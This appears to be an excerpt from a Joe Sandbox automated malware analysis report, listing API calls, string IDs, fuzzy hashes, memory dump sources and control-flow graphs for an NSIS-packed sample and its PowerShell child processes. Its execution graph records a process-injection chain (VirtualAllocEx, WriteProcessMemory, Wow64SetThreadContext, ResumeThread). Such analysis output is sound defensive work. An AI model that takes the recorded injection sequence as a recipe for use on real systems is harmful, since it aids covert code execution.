                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                                                    • String ID: %u.%u%s%s
                                                                                                                                    • API String ID: 3540041739-3551169577
                                                                                                                                    • Opcode ID: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                                                                                                                    • Instruction ID: 0fe25742dfe6cfa92c38baccc724587d3b65f537d6828788df476db8ac6fa50e
                                                                                                                                    • Opcode Fuzzy Hash: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                                                                                                                    • Instruction Fuzzy Hash: B111EB336042283BDB109A6DAC45E9E329CDF85374F250237FA65F71D1E978DC2282E8
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E2C
                                                                                                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E36
                                                                                                                                    • lstrcatW.KERNEL32(?,0040A014), ref: 00405E48
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E26
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                    • API String ID: 2659869361-3081826266
                                                                                                                                    • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                                                                    • Instruction ID: dcb1dcffde27bcde4b46a4bd7655c85b8e924b1ae314dab144fc932f30a80b76
                                                                                                                                    • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                                                                    • Instruction Fuzzy Hash: 9DD0A731501534BAC212AB54AD04DDF62AC9F46344381443BF141B30A5C77C5D51D7FD
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • DestroyWindow.USER32(00000000,00000000,004031FC,00000001), ref: 00403031
                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040304F
                                                                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
                                                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 0040307A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2102729457-0
                                                                                                                                    • Opcode ID: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
                                                                                                                                    • Instruction ID: 9291db8f65f8f9a8906298ccab22143765a9ea5c3e1cf5a275661437a5304794
                                                                                                                                    • Opcode Fuzzy Hash: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
                                                                                                                                    • Instruction Fuzzy Hash: 22F08970602A21AFC6306F50FE09A9B7F68FB45B52B51053AF445B11ACCB345C91CB9D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                                                                                                                      • Part of subcall function 00405ED1: CharNextW.USER32(?,?,0042F270,?,00405F45,0042F270,0042F270,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405EDF
                                                                                                                                      • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
                                                                                                                                      • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC
• lstrlenW.KERNEL32(0042F270,00000000,0042F270,0042F270,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405F87
• GetFileAttributesW.KERNEL32(0042F270,0042F270,0042F270,0042F270,0042F270,0042F270,00000000,0042F270,0042F270,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405F97
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 00405F2E
Memory Dump Source
• Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
Similarity
• API ID: CharNext$AttributesFilelstrcpynlstrlen
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 3248276644-3081826266
• Opcode ID: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
• Instruction ID: 0bce86d1d95a7c790b53086ee47358a3377499fb664fcb231eb74dc800c81f90
• Opcode Fuzzy Hash: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
• Instruction Fuzzy Hash: 7AF0F43A105E1269D622733A5C09AAF1555CE86360B5A457BFC91B22C6CF3C8A42CCBE
Uniqueness

Uniqueness Score: -1.00%

APIs
• IsWindowVisible.USER32(?), ref: 0040557F
• CallWindowProcW.USER32(?,?,?,?), ref: 004055D0
  • Part of subcall function 00404522: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534
Strings
Memory Dump Source
• Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
Similarity
• API ID: Window$CallMessageProcSendVisible
• String ID:
• API String ID: 3748168415-3916222277
• Opcode ID: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
• Instruction ID: 994decb8795c597c60d879b60f38f30bda4d2919c1ffc13ce94f3a2918c86729
• Opcode Fuzzy Hash: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
• Instruction Fuzzy Hash: 1C01717120060CBFEF219F11DD84A9B3B67EB84794F144037FA41761D5C7398D529A6D
Uniqueness

Uniqueness Score: -1.00%

APIs
• FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,00403B6C,00403A82,?,?,00000008,0000000A,0000000C), ref: 00403BAE
• GlobalFree.KERNEL32(00000000), ref: 00403BB5
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 00403B94
Memory Dump Source
• Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
Similarity
• API ID: Free$GlobalLibrary
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 1100898210-3081826266
• Opcode ID: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
• Instruction ID: cb28855b84c3abb27e6c937247341fa4f051846acd49e0d4b6103447305c23c4
• Opcode Fuzzy Hash: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
• Instruction Fuzzy Hash: 5DE0C23362083097C6311F55EE04B1A7778AF89B2AF01402AEC407B2618B74AC538FCC
Uniqueness

Uniqueness Score: -1.00%

APIs
• lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
• lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FD4
• CharNextA.USER32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE5
• lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE
Memory Dump Source
• Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
Similarity
• API ID: lstrlen$CharNextlstrcmpi
• String ID:
• API String ID: 190613189-0
• Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
• Instruction ID: e9567a821587a5f0376c4e2be66d4cfc8c6f540c5076303c4651ac02cb4e93c6
• Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
• Instruction Fuzzy Hash: E1F09631105519FFC7029FA5DE00D9FBBA8EF05350B2540B9F840F7250D678DE01AB69
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000004.00000002.1648710936.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4e40000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bc201155a2ec50180798f78bafa606917097d8106640a1a7eb45077eed3adfac
• Instruction ID: 263f02ba94c0917d6e1e07beec723024e654b2d110f43f987758f8832d9e437d
• Opcode Fuzzy Hash: bc201155a2ec50180798f78bafa606917097d8106640a1a7eb45077eed3adfac
• Instruction Fuzzy Hash: 2191BD74A002058FCB15CF59C4989AEFBB1FF88314B248699E955AB3A5C735FC81CFA0
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000004.00000002.1648710936.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4e40000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c62f278f444645cdd1e2a35b24a0227f6605807821875bf12ae5775c8e903235
• Instruction ID: 856414bdb61c1f278efa02f4509fb3efcdca9cf56a7ddfa17c28e85d3cae8d4b
• Opcode Fuzzy Hash: c62f278f444645cdd1e2a35b24a0227f6605807821875bf12ae5775c8e903235
• Instruction Fuzzy Hash: C34169B4A001058FCB09CF59D1989AEFBB1FF88314B158599E915AB364C736FC91CFA0
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000004.00000002.1648440373.000000000485D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_485d000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 63ff792978bb5655cea242958bc780d36bcaa7bade9cdf4d89a0930e99bc9088
• Instruction ID: 2f679c471c6fd8c7fe6cffd6a1eba96f6b7f7afcd3f212d2a833d6bba7e67809
• Opcode Fuzzy Hash: 63ff792978bb5655cea242958bc780d36bcaa7bade9cdf4d89a0930e99bc9088
• Instruction Fuzzy Hash: 8C012B311083049AE710AE26DD84767BFD8DF41324F08CA2AEC088F256C279E845CAB1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000004.00000002.1648440373.000000000485D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_485d000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2d789836a5b56676bfafa6c0519da357b926c08d28f839ffeff0b61ef487ba8f
• Instruction ID: 8f4487c540fd8eb3faaade292e7bc50a444420d0a6ffb3b292a410eaaabad7e3
• Opcode Fuzzy Hash: 2d789836a5b56676bfafa6c0519da357b926c08d28f839ffeff0b61ef487ba8f
• Instruction Fuzzy Hash: 5F01406100E3C09ED7129B259994B56BFB4DF53224F18C5DBDD888F1A3C2699849C772
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 4.4%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 12
Total number of Limit Nodes: 0
execution_graph 14717 517fb30 14718 517fb74 ResumeThread 14717->14718 14720 517fbc0 14718->14720 14721 517fc20 14722 517fc69 Wow64SetThreadContext 14721->14722 14724 517fce1 14722->14724 14725 517fd48 14726 517fd8c VirtualAllocEx 14725->14726 14728 517fe04 14726->14728 14729 517fe68 14730 517feb4 WriteProcessMemory 14729->14730 14732 517ff4d 14730->14732

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 0 7d742ae-7d742b1 1 7d742b7-7d742bf 0->1 2 7d742b3-7d742b5 0->2 3 7d742d7-7d742db 1->3 4 7d742c1-7d742c7 1->4 2->1 7 7d742e1-7d742e5 3->7 8 7d744ba-7d744c4 3->8 5 7d742cb-7d742d5 4->5 6 7d742c9 4->6 5->3 6->3 11 7d742e7-7d742f8 7->11 12 7d74325 7->12 9 7d744c6-7d744cf 8->9 10 7d744d2-7d744d8 8->10 14 7d744de-7d744ea 10->14 15 7d744da-7d744dc 10->15 22 7d74512-7d74521 call 7d7452b 11->22 23 7d742fe-7d74303 11->23 13 7d74327-7d74329 12->13 13->8 17 7d7432f-7d74335 13->17 18 7d744ec-7d7450f 14->18 15->18 17->8 20 7d7433b-7d74348 17->20 24 7d743de-7d7441d 20->24 25 7d7434e-7d74353 20->25 27 7d74305-7d7430b 23->27 28 7d7431b-7d74323 23->28 54 7d74424-7d74428 24->54 30 7d74355-7d7435b 25->30 31 7d7436b-7d74381 25->31 32 7d7430f-7d74319 27->32 33 7d7430d 27->33 28->13 35 7d7435f-7d74369 30->35 36 7d7435d 30->36 31->24 42 7d74383-7d743a3 31->42 32->28 33->28 35->31 36->31 47 7d743a5-7d743ab 42->47 48 7d743bd-7d743dc 42->48 49 7d743af-7d743bb 47->49 50 7d743ad 47->50 48->54 49->48 50->48 55 7d7444b 54->55 56 7d7442a-7d74433 54->56 60 7d7444e-7d7445a 55->60 58 7d74435-7d74438 56->58 59 7d7443a-7d74447 56->59 61 7d74449 58->61 59->61 62 7d74460-7d744b7 60->62 61->60
Strings
Memory Dump Source
• Source File: 00000005.00000002.1735395891.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7d70000_powershell.jbxd
Similarity
• API ID:
• String ID: (o^q$(o^q$84al$84al$tP^q$tP^q
• API String ID: 0-3493605685
• Opcode ID: 4f8833deb5364fb3f87f8da6883af53ae952b59b768d4e8e6040e6a80033b01a
• Instruction ID: 8c0256e5e3eaa1822cc12ad6bead632f46cfabaa9ca817b977acb1ccdb76047f
• Opcode Fuzzy Hash: 4f8833deb5364fb3f87f8da6883af53ae952b59b768d4e8e6040e6a80033b01a
                                                                                                                                    • Instruction Fuzzy Hash: E56145B0B40289DFCB16DF68C845B6AFBE2BF86310F148465E8494F395EB71D851CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 65 7d73d08-7d73d17 66 7d73d37 65->66 67 7d73d19-7d73d35 65->67 68 7d73d39-7d73d3b 66->68 67->68 70 7d73de7-7d73df1 68->70 71 7d73d41-7d73d48 68->71 72 7d73df3-7d73dfa 70->72 73 7d73dfd-7d73e03 70->73 74 7d73e35-7d73e7d 71->74 75 7d73d4e-7d73d53 71->75 78 7d73e05-7d73e07 73->78 79 7d73e09-7d73e15 73->79 85 7d73e83-7d73e88 74->85 86 7d73fc1-7d7401e 74->86 76 7d73d55-7d73d5b 75->76 77 7d73d6b-7d73d81 75->77 81 7d73d5f-7d73d69 76->81 82 7d73d5d 76->82 77->74 92 7d73d87-7d73da9 77->92 84 7d73e17-7d73e32 78->84 79->84 81->77 82->77 90 7d73ea0-7d73eac 85->90 91 7d73e8a-7d73e90 85->91 103 7d73eb2-7d73eb5 90->103 104 7d73f6e-7d73f78 90->104 94 7d73e94-7d73e9e 91->94 95 7d73e92 91->95 101 7d73dc3-7d73dce 92->101 102 7d73dab-7d73db1 92->102 94->90 95->90 110 7d73dd3-7d73de4 101->110 107 7d73db5-7d73dc1 102->107 108 7d73db3 102->108 103->104 109 7d73ebb-7d73ec2 103->109 105 7d73f86-7d73f8c 104->105 106 7d73f7a-7d73f83 104->106 111 7d73f92-7d73f9e 105->111 112 7d73f8e-7d73f90 105->112 107->101 108->101 109->86 113 7d73ec8-7d73ecd 109->113 116 7d73fa0-7d73fbe 111->116 112->116 114 7d73ee5-7d73ee9 113->114 115 7d73ecf-7d73ed5 113->115 114->104 121 7d73eef-7d73ef1 114->121 118 7d73ed7 115->118 119 7d73ed9-7d73ee3 115->119 118->114 119->114 121->104 123 7d73ef3 121->123 126 7d73efa-7d73efc 123->126 128 7d73f14-7d73f6b 126->128 129 7d73efe-7d73f04 126->129 130 7d73f06 129->130 131 7d73f08-7d73f0a 129->131 130->128 131->128
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1735395891.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_7d70000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'^q$4'^q$84al$84al$tP^q$tP^q
                                                                                                                                    • API String ID: 0-243610401
                                                                                                                                    • Opcode ID: 66e8ee22b2f5b163fc4e5279ecb0e5cfba199e074d80db4be81df9103ede9a0d
                                                                                                                                    • Instruction ID: 40bead7c51bb411b36f369476c56a0cdec57051e17ebeb5e3b62779a608bddf6
                                                                                                                                    • Opcode Fuzzy Hash: 66e8ee22b2f5b163fc4e5279ecb0e5cfba199e074d80db4be81df9103ede9a0d
                                                                                                                                    • Instruction Fuzzy Hash: 977122B17083958FCB158B2DD84466AFFF2AF85220F1884BBE445CB291EB32CC45D7A1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 133 7d73ce8-7d73d17 135 7d73d37 133->135 136 7d73d19-7d73d35 133->136 137 7d73d39-7d73d3b 135->137 136->137 139 7d73de7-7d73df1 137->139 140 7d73d41-7d73d48 137->140 141 7d73df3-7d73dfa 139->141 142 7d73dfd-7d73e03 139->142 143 7d73e35-7d73e7d 140->143 144 7d73d4e-7d73d53 140->144 147 7d73e05-7d73e07 142->147 148 7d73e09-7d73e15 142->148 154 7d73e83-7d73e88 143->154 155 7d73fc1-7d7401e 143->155 145 7d73d55-7d73d5b 144->145 146 7d73d6b-7d73d81 144->146 150 7d73d5f-7d73d69 145->150 151 7d73d5d 145->151 146->143 161 7d73d87-7d73da9 146->161 153 7d73e17-7d73e32 147->153 148->153 150->146 151->146 159 7d73ea0-7d73eac 154->159 160 7d73e8a-7d73e90 154->160 172 7d73eb2-7d73eb5 159->172 173 7d73f6e-7d73f78 159->173 163 7d73e94-7d73e9e 160->163 164 7d73e92 160->164 170 7d73dc3-7d73dce 161->170 171 7d73dab-7d73db1 161->171 163->159 164->159 179 7d73dd3-7d73de4 170->179 176 7d73db5-7d73dc1 171->176 177 7d73db3 171->177 172->173 178 7d73ebb-7d73ec2 172->178 174 7d73f86-7d73f8c 173->174 175 7d73f7a-7d73f83 173->175 180 7d73f92-7d73f9e 174->180 181 7d73f8e-7d73f90 174->181 176->170 177->170 178->155 182 7d73ec8-7d73ecd 178->182 185 7d73fa0-7d73fbe 180->185 181->185 183 7d73ee5-7d73ee9 182->183 184 7d73ecf-7d73ed5 182->184 183->173 190 7d73eef-7d73ef1 183->190 187 7d73ed7 184->187 188 7d73ed9-7d73ee3 184->188 187->183 188->183 190->173 192 7d73ef3 190->192 195 7d73efa-7d73efc 192->195 197 7d73f14-7d73f6b 195->197 198 7d73efe-7d73f04 195->198 199 7d73f06 198->199 200 7d73f08-7d73f0a 198->200 199->197 200->197
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1735395891.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_7d70000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 84al$tP^q
                                                                                                                                    • API String ID: 0-2668233308
                                                                                                                                    • Opcode ID: e24b7d59918c4ebd329d6cf6837b44323763026f397423655903ae961e1879d4
                                                                                                                                    • Instruction ID: 55132450d4d3de5251c28d8ed54b4dd1fea4b1c07428f39de4daafadcb5d70e6
                                                                                                                                    • Opcode Fuzzy Hash: e24b7d59918c4ebd329d6cf6837b44323763026f397423655903ae961e1879d4
                                                                                                                                    • Instruction Fuzzy Hash: 732106B12043C59FD7159B29C884BA5FFF2AF46620F1880A6E444CF2A2DB75CC86C7A1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 202 517fe68-517fed3 204 517fed5-517fee7 202->204 205 517feea-517ff4b WriteProcessMemory 202->205 204->205 207 517ff54-517ffa6 205->207 208 517ff4d-517ff53 205->208 208->207
                                                                                                                                    APIs
                                                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0517FF3B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1713531774.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_5170000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3559483778-0
                                                                                                                                    • Opcode ID: da8c0ded0fce301f747fe776dea71df042b9f7a40fc01683a73f957d017c4f2f
                                                                                                                                    • Instruction ID: 1b02f8cdd71bffb74c2a253535c357968424ad32edbd13870dd43759ffbb1e66
                                                                                                                                    • Opcode Fuzzy Hash: da8c0ded0fce301f747fe776dea71df042b9f7a40fc01683a73f957d017c4f2f
                                                                                                                                    • Instruction Fuzzy Hash: 684199B5D052589FCF00CFA9D984ADEFBF1BB49310F24902AE819B7210D738AA45CF64
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 213 517fd48-517fe02 VirtualAllocEx 216 517fe04-517fe0a 213->216 217 517fe0b-517fe55 213->217 216->217
                                                                                                                                    APIs
                                                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0517FDF2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1713531774.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_5170000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                    • Opcode ID: f587cbd162d50f936b749f6bca58fe7e8b67fd964605f5e4ee089c9ff38f5009
                                                                                                                                    • Instruction ID: 5339f0b768e11b767c25fee86514ce9100fdbac47ecf92f35cd81c386ae388be
                                                                                                                                    • Opcode Fuzzy Hash: f587cbd162d50f936b749f6bca58fe7e8b67fd964605f5e4ee089c9ff38f5009
                                                                                                                                    • Instruction Fuzzy Hash: D63189B9D04258DFCF10CFA9D984ADEFBB1BB49320F10942AE815B7210D735A945CF58
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
